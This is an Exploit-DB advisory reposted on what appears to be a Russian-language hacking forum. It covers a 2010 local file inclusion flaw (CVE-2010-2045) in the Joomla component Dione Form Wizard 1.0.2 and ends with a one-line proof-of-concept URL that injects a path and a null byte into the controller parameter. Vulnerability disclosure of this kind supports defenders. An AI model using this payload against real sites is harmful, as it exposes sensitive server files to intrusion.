Exploit Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12595
Проверка EDB
  1. Пройдено
Автор
CHIP D3 BI0S
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-2045
Дата публикации
2010-05-13
Код:
-----------------------------------------------------------------------------------------
Joomla Component FDione Form Wizard lfi vulnerability
-----------------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Email		: chipdebios[alt+64]gmail.com
Date		: 2010-05-13
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   	: Dione Form Wizard
version       	: 1.0.2
Developer     	: Dione Soft Company
License       	: GPL            type  : Commercial
price		: $20
Date Added    	: 9 may 2010
Download      	: http://dionesoft.com/products/dione_form_wizard/product.html

Description   	:

Dione Form Wizard is Joomla! component allows website administrator to create web forms easily through simple drag-and-drop editor.

This product gives you the power to create forms that run inside Joomla without requiring knowledge of HTML, MySQL and PHP.

The main idea of the Dione Form Wizard is to give a tool that is enabling you to create a dynamic forms in minutes within your Joomla! CMS.
---------------------------------------------------------------------------

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_dioneformwizard&controller=[LFI]%00



+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
 
Источник
www.exploit-db.com

Похожие темы